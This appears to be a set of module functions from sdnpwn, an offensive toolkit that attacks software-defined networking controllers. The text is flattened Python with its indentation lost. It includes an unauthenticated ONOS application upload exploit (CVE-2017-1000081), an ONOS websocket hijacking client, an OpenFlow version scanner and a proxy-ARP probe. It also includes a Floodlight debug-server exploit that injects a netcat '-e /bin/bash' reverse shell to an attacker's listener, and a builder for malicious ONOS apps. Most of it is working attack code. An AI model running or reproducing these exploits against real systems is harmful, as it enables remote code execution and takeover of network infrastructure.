def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
target = ""
app = ""
target = sdnpwn.getArg(["-t", "--target"], params)
port = sdnpwn.getArg(["-p", "--port"], params, "8181")
app = sdnpwn.getArg(["-a", "--app"], params)
if (target == None or app == None):
sdnpwn.printWarning("Missing required parameter.")
exit(0)
sdnpwn.printNormal(
"Attempting unauthenticated app upload (CVE-2017-1000081)")
url = "http://" + target + ":" + str(
port) + "/onos/ui/rs/applications/upload?activate=true"
response = requests.post(url, files={'file': open(app, 'rb')})
if (response.status_code == 200):
sdnpwn.printSuccess(
"Got 200 OK - Application uploaded and activiated!")
else:
sdnpwn.printWarning("Got " + str(response.status_code))
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
if(sdnpwn.checkArg(["-t", "--target"], params)):
port = str(sdnpwn.getArg(["-p", "--port"], params, 8181))
cookie = sdnpwn.getArg(["-c", "--cookie"], params, None)
wsURL = "ws://" + sdnpwn.getArg(["-t", "--target"], params) + ":" + port + "/onos/ui/websock/core"
#websocket.enableTrace(True)
ws = websocket.WebSocketApp(wsURL)
ws.on_open = onOpen
ws.on_message = onMessage
ws.on_error = onError
ws.on_close = onClose
ws.sdnpwn_params = params
ws.sdnpwn_expected_events = 1 #Execting initial bootstrap event
if(cookie is not None):
ws.cookie = cookie
sdnpwn.printNormal("Attempting connection to " + wsURL)
ws.run_forever()
else:
print(usage())
def run(params):
signal.signal(signal.SIGINT, signal_handler) # Assign the signal handler
iface = sdnpwn.getArg(["-i", "--iface"], params, "eth0")
verbose = sdnpwn.checkArg(["-v", "--verbose"], params)
try:
if (verbose):
sdnpwn.printVerbose("Getting MAC and IP address for interface " +
iface)
ifaceIP = sdnpwn.getIPAddress(iface)
ifaceMac = sdnpwn.getMacAddress(iface)
if (ifaceMac == "0" or ifaceIP == "0"):
sdnpwn.printError("Cannot get details for interface " + iface +
" ")
return
if (verbose):
sdnpwn.printVerbose("Making this host known in the network")
sendp(
Ether(src=ifaceMac, dst="FF:FF:FF:FF:FF:FF", type=0x0806) /
ARP(op=ARP.is_at, psrc=ifaceIP, hwsrc=ifaceMac, pdst=ifaceIP)
) # We just want the controller to know about this host
sdnpwn.printNormal("Sending ARP request for this host...")
resp = srp(Ether(src=ifaceMac, dst="FF:FF:FF:FF:FF:FF", type=0x0806) /
ARP(op=ARP.who_has, pdst=ifaceIP),
timeout=2)
try:
if (resp[0][ARP][0][1].psrc == ifaceIP):
sdnpwn.printWarning("Proxy ARP is active")
else:
sdnpwn.printError("Got another address: " +
resp[0][ARP][0][1].psrc)
except:
# This should only fail if there is no response or the response is not ARP.
sdnpwn.printSuccess("Proxy ARP is not active")
except Exception as e:
print(e)
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
target = sdnpwn.getArg(["--target", "-t"], params)
port = sdnpwn.getArg(["--port", "-p"], params)
sockTimeout = sdnpwn.getArg(["--socket-timeout", "-s"], params, 2)
of.verbose = False
if (target == None):
print(info())
print(usage())
return
else:
startIndex = 0
endIndex = 1
if ("/" in target):
targets = ip_network(target)
startIndex = 1
endIndex = targets.num_addresses - 1
else:
targets = ip_network(str(target) + "/32")
ports = getPorts(port)
sdnpwn.printNormal("Starting scan")
for host in range(startIndex, endIndex):
targetHost = targets[host].exploded
targetRes = []
for port in ports:
try:
versions = enumerateVersions(targetHost, port, sockTimeout)
except:
pass
if (versions is not None):
targetRes.append((port, versions))
if (len(targetRes) > 0):
prettyPrint(targetHost, targetRes)
sdnpwn.printSuccess("Finished")
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
target = sdnpwn.getArg(["--target", "-t"], params)
listening = sdnpwn.getArg(["--listen", "-l"], params)
noSpawnLocal = sdnpwn.checkArg(["--no-local", "-r"], params)
listeningIP = listening.split(":")[0]
listeningPort = listening.split(":")[1]
floodlightDebugPort = 6655
if (noSpawnLocal == False):
sdnpwn.printNormal("Setting up shell handler...")
listener = Thread(target=listenForShell, args=(listeningPort, ))
listener.start()
threads.append(listener)
sdnpwn.printNormal("Attempting connection to debug server...")
sock = getSocket(target, floodlightDebugPort, 5)
if (sock == None):
sdnpwn.printError("Could not connect...quiting.")
exit(0)
sdnpwn.printNormal("Getting shell...")
badString = "import subprocess; subprocess.call(['nc','-e', '/bin/bash', '" + listeningIP + "', '" + listeningPort + "\r'])"
sock.send(badString.encode())
socks.append(sock)
while stopListening == False:
pass
def run(params):
signal.signal(signal.SIGINT, signal_handler) #Assign the signal handler
appDir = sdnpwn.getArg(["-b", "--build"], params, None)
doConfig = sdnpwn.checkArg(["-c", "--configure"], params)
if(appDir == None):
sdnpwn.message("No app directory specified", sdnpwn.ERROR)
return
if(doConfig):
try:
with open(appDir + "/sdnpwn_options", 'r+') as confFile:
#confFile = open(appDir + "/sdnpwn_options", 'r+')
confOut = ""
for l in confFile.readlines():
conf = l.split("=")
confVal = input(conf[0] + " [" + conf[1].replace("\n","") + "]: ") or conf[1].replace("\n","")
confOut += conf[0] + "=" + confVal + "\n"
confFile.seek(0)
confFile.write(confOut)
except Exception as e:
sdnpwn.printWarning("Error while setting configuration!")
print(e)
return
sdnpwn.printNormal("Building " + appDir)
buildDir = appDir + "-building-temp"
try:
shutil.copytree(appDir, buildDir)
config= {}
with open(buildDir + "/sdnpwn_options", 'r') as confFile:
for l in confFile.readlines():
conf = l.split("=")
config[conf[0]] = conf[1].replace("\n","")
sdnpwn.printNormal("Got configuration")
with open(buildDir + "/pom.xml", 'r+') as pomFile:
pomFileData = pomFile.read()
pomFile.seek(0)
for k in config.keys():
pomFileData = pomFileData.replace(k, config[k])
pomFile.write(pomFileData)
javaFilesLocation = buildDir + "/src/main/java/org/onosproject/app/"
javaFiles = [f for f in listdir(javaFilesLocation) if isfile(join(javaFilesLocation, f))]
for j in javaFiles:
#with open(javaFilesLocation + j, 'r+') as javaFile:
#javaFileData = javaFile.read()
#javaFile.seek(0)
#Above method won't overwrite the whole file for some reason. Should check out why.
javaFile = open(javaFilesLocation + j, 'r')
javaFileData = javaFile.read()
javaFile.close()
for k in config.keys():
javaFileData = javaFileData.replace(k, config[k])
javaFile = open(javaFilesLocation + j, 'w')
javaFile.write(javaFileData)
javaFile.close()
sdnpwn.printSuccess("Files updated with configuration")
sdnpwn.printNormal("Compiling app with maven")
call(['mvn', '-f', buildDir, 'clean', 'install'])
shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.oar", "apps/compiled_apps/")
shutil.copy(buildDir + "/target/" + config["$APP_NAME"] + "-1.0-SNAPSHOT.jar", "apps/compiled_apps/")
sdnpwn.printSuccess("OAR and JAR file moved to apps/compiled_apps")
if(sdnpwn.checkArg(["-k", "--keep-source"], params)):
shutil.copytree(buildDir, appDir + "-" + str(datetime.datetime.now()).split(" ")[0])
sdnpwn.printNormal("App source saved in " + appDir + "-" + str(datetime.datetime.now()).split(" ")[0])
except Exception as e:
sdnpwn.printError("Error building " + appDir)
print(e)
finally:
shutil.rmtree(buildDir)